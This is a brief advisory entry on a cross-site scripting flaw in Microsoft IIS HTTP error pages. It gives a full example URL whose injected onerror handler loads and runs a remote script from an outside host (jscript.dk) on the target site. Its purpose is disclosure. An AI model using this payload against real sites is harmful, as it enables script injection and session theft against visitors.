Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability
The following example was provided: http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is served by an IIS installation. |
|
Privacy Statement |